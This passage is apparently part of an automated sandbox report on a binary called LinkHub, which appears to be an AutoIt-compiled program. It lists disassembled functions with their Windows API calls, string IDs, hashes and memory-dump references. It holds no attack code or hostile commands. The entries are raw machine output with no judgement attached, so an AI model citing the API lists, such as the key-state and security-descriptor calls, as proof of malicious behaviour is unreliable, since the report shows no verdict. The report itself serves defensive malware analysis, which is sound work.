                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 25ed12f45ae595a0109f28404b4ea3a1e4286e79f0f9295741c884a64d99d3bd
                                                                                        • Instruction ID: 66700842e130eed1f2872d5002d40ebf3b34754e87573a8225f70e690cd06e30
                                                                                        • Opcode Fuzzy Hash: 25ed12f45ae595a0109f28404b4ea3a1e4286e79f0f9295741c884a64d99d3bd
                                                                                        • Instruction Fuzzy Hash: BBD017BE1B020269EC180E3C9B2FE370D09A302741F82434BF122D5595E4C199A5A621
                                                                                        Function 00220D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0022075E), ref: 00220D4A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: acb7e2d855520e435e573b50f72af4883c72d48cdd9c506f6766e4629a5a0f86
                                                                                        • Instruction ID: de7792b21105290512466cdfb3582e53ded665181da336486e1bf39222861cfa
                                                                                        • Opcode Fuzzy Hash: acb7e2d855520e435e573b50f72af4883c72d48cdd9c506f6766e4629a5a0f86
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Function 0028353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 0028358D
                                                                                        • DeleteObject.GDI32(00000000), ref: 002835A0
                                                                                        • DestroyWindow.USER32 ref: 002835AF
                                                                                        • GetDesktopWindow.USER32 ref: 002835CA
                                                                                        • GetWindowRect.USER32(00000000), ref: 002835D1
                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00283700
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0028370E
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283755
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00283761
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0028379D
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837BF
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837D2
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837DD
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002837E6
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002837F5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002837FE
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283805
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00283810
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283822
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,002A0C04,00000000), ref: 00283838
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00283848
                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0028386E
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0028388D
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002838AF
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00283A9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: c6965ddf0956710ef15e134c7cd3b9dc238f2732420446dca95314e9bf547d4a
                                                                                        • Instruction ID: 0a3b092a61c07e45b8259a49a144ea95ffeeab2914e173d5d6e56bde1b23bd03
                                                                                        • Opcode Fuzzy Hash: c6965ddf0956710ef15e134c7cd3b9dc238f2732420446dca95314e9bf547d4a
                                                                                        • Instruction Fuzzy Hash: 17029A76910209EFDB14DF64DD89EAEBBB9EB48710F008149F915AB2A1CB74AD11CF60
                                                                                        Function 00201625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?), ref: 002016B4
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00242B07
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00242B40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00242F85
                                                                                          • Part of subcall function 00201802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00201488,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 00201865
                                                                                        • SendMessageW.USER32(?,00001053), ref: 00242FC1
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00242FD8
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00242FEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00242FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                        • String ID: 0$(-$(-$(-
                                                                                        • API String ID: 2760611726-2868662787
                                                                                        • Opcode ID: 47f8c9dbfd0c55e36e428ad76d3f4f59b2ae038521a22eb0a72f84f5e759cd73
                                                                                        • Instruction ID: e0ae2fd51caddd080af52bbd51138f43d074e2f5e8f53399df2973dc1c92c997
                                                                                        • Opcode Fuzzy Hash: 47f8c9dbfd0c55e36e428ad76d3f4f59b2ae038521a22eb0a72f84f5e759cd73
                                                                                        • Instruction Fuzzy Hash: 2B12C230621242DFC729CF15D898BA9B7F5FB44300F98456AF4459B262C732ECAADF91
                                                                                        Function 00297B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00297B67
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00297B98
                                                                                        • GetSysColor.USER32(0000000F), ref: 00297BA4
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00297BBE
                                                                                        • SelectObject.GDI32(?,?), ref: 00297BCD
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00297BF8
                                                                                        • GetSysColor.USER32(00000010), ref: 00297C00
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00297C07
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00297C16
                                                                                        • DeleteObject.GDI32(00000000), ref: 00297C1D
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00297C68
                                                                                        • FillRect.USER32(?,?,?), ref: 00297C9A
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00297CBC
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(00000012), ref: 00297E5B
                                                                                          • Part of subcall function 00297E22: SetTextColor.GDI32(?,00297B2D), ref: 00297E5F
                                                                                          • Part of subcall function 00297E22: GetSysColorBrush.USER32(0000000F), ref: 00297E75
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(0000000F), ref: 00297E80
                                                                                          • Part of subcall function 00297E22: GetSysColor.USER32(00000011), ref: 00297E9D
                                                                                          • Part of subcall function 00297E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00297EAB
                                                                                          • Part of subcall function 00297E22: SelectObject.GDI32(?,00000000), ref: 00297EBC
                                                                                          • Part of subcall function 00297E22: SetBkColor.GDI32(?,?), ref: 00297EC5
                                                                                          • Part of subcall function 00297E22: SelectObject.GDI32(?,?), ref: 00297ED2
                                                                                          • Part of subcall function 00297E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00297EF1
                                                                                          • Part of subcall function 00297E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00297F08
                                                                                          • Part of subcall function 00297E22: GetWindowLongW.USER32(?,000000F0), ref: 00297F15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                        • String ID:
                                                                                        • API String ID: 4124339563-0
                                                                                        • Opcode ID: cbcba472510d749119f37e0c21443751840bea8b54213c08c5b98d7cd1830024
                                                                                        • Instruction ID: 02e2875347081523b6663c381a36fa4af970dad854bcb4f78ced48597a2f5054
                                                                                        • Opcode Fuzzy Hash: cbcba472510d749119f37e0c21443751840bea8b54213c08c5b98d7cd1830024
                                                                                        • Instruction Fuzzy Hash: B3A19C72028302AFCB109F64EC4CE6BBBA9FF48324F500A1AFA66961E0D771D954DB51
                                                                                        Function 0028316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 0028319B
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002832C7
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00283306
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00283316
                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0028335D
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00283369
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002833B2
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002833C1
                                                                                        • GetStockObject.GDI32(00000011), ref: 002833D1
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002833D5
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002833E5
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002833EE
                                                                                        • DeleteDC.GDI32(00000000), ref: 002833F7
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00283423
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0028343A
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0028347A
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0028348E
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0028349F
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002834D4
                                                                                        • GetStockObject.GDI32(00000011), ref: 002834DF
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002834EA
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002834F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 3866d04a2187966d9913a3e112f466be3f61af2badd9bc2b052ddf563f7fdab9
                                                                                        • Instruction ID: 5d86650380edcc567e0c06e37edda75001f413b4de72ecf8c405bf380d03f53a
                                                                                        • Opcode Fuzzy Hash: 3866d04a2187966d9913a3e112f466be3f61af2badd9bc2b052ddf563f7fdab9
                                                                                        • Instruction Fuzzy Hash: C7B16CB1A11205AFEB14DFA8DC49FAEBBB9EB08710F008155FA15E72D1D774AD10CBA0
                                                                                        Function 00275524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00275532
                                                                                        • GetDriveTypeW.KERNEL32(?,0029DC30,?,\\.\,0029DCD0), ref: 0027560F
                                                                                        • SetErrorMode.KERNEL32(00000000,0029DC30,?,\\.\,0029DCD0), ref: 0027577B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: b6b9e458037ac3ebd211adb3edd5f0c4923566abda7377ee8b1938878434f107
                                                                                        • Instruction ID: 571751eeb5965dad7a44aff783d8f18611993aa3cb2b3bb5582caabfc93fa64e
                                                                                        • Opcode Fuzzy Hash: b6b9e458037ac3ebd211adb3edd5f0c4923566abda7377ee8b1938878434f107
                                                                                        • Instruction Fuzzy Hash: DF61AE30A74A56DBC728DF24C991E78F3A1AF15350B24C11AE40EAB291CBF19D71DF51
                                                                                        Function 00202521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002025F8
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00202600
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020262B
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00202633
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00202658
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00202675
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00202685
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002026B8
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002026CC
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 002026EA
                                                                                        • GetStockObject.GDI32(00000011), ref: 00202706
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00202711
                                                                                          • Part of subcall function 002019CD: GetCursorPos.USER32(?), ref: 002019E1
                                                                                          • Part of subcall function 002019CD: ScreenToClient.USER32(00000000,?), ref: 002019FE
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000001), ref: 00201A23
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000002), ref: 00201A3D
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0020199C), ref: 00202738
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: <)-$<)-$AutoIt v3 GUI$(-$(-$(-
                                                                                        • API String ID: 1458621304-2643633994
                                                                                        • Opcode ID: 390b932cfe2e225b0cdeeee454a0e9efbba9d9897dbb82e6f569a3597edcdef6
                                                                                        • Instruction ID: 47560ea30be9024098f591dfa6cdd2020768ecc8a58e8269a68b15e6dacd2168
                                                                                        • Opcode Fuzzy Hash: 390b932cfe2e225b0cdeeee454a0e9efbba9d9897dbb82e6f569a3597edcdef6
                                                                                        • Instruction Fuzzy Hash: 8FB15931A1020ADFDB18DFA8DC99BAA7BB4FB48314F10421AFA15A72D0C770A965DF54
                                                                                        Function 00291A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00291BC4
                                                                                        • GetDesktopWindow.USER32 ref: 00291BD9
                                                                                        • GetWindowRect.USER32(00000000), ref: 00291BE0
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00291C35
                                                                                        • DestroyWindow.USER32(?), ref: 00291C55
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00291C89
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00291CA7
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00291CB9
                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00291CCE
                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00291CE1
                                                                                        • IsWindowVisible.USER32(00000000), ref: 00291D3D
                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00291D58
                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00291D6C
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00291D84
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00291DAA
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00291DC4
                                                                                        • CopyRect.USER32(?,?), ref: 00291DDB
                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00291E46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: db36faf05d4b27d9bc5b3374977f0ea4317f8a7d5a9f80b4d2859c75f6a5ff86
                                                                                        • Instruction ID: 87f728d3d76e2102806d4a0d3a50195ec240db5019d74b6c03f218d157c69047
                                                                                        • Opcode Fuzzy Hash: db36faf05d4b27d9bc5b3374977f0ea4317f8a7d5a9f80b4d2859c75f6a5ff86
                                                                                        • Instruction Fuzzy Hash: 31B1AE71614302AFDB14DF65D984B6ABBE5FF84310F00891DF9999B291C731E864CFA2
                                                                                        Function 00290CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00290D81
                                                                                        • _wcslen.LIBCMT ref: 00290DBB
                                                                                        • _wcslen.LIBCMT ref: 00290E25
                                                                                        • _wcslen.LIBCMT ref: 00290E8D
                                                                                        • _wcslen.LIBCMT ref: 00290F11
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00290F61
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00290FA0
                                                                                          • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
                                                                                          • Part of subcall function 00262B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00262BA5
                                                                                          • Part of subcall function 00262B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00262BD7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 1103490817-719923060
                                                                                        • Opcode ID: 659634f5db0a957a223383257ddd80d61917aa204c08ce5c774e625c96431c04
                                                                                        • Instruction ID: eb45fb047fb1ea0815ce72b1c480225f00cd6e7e4577d3d6e6515b362e598400
                                                                                        • Opcode Fuzzy Hash: 659634f5db0a957a223383257ddd80d61917aa204c08ce5c774e625c96431c04
                                                                                        • Instruction Fuzzy Hash: 91E1D0312283068FCB14DF24C99097AB3E5BF98314B148A2DF896977A2CB31ED65CB51
                                                                                        Function 002616D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
                                                                                          • Part of subcall function 00261A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
                                                                                          • Part of subcall function 00261A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
                                                                                          • Part of subcall function 00261A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00261741
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00261775
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0026178C
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 002617C6
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002617E2
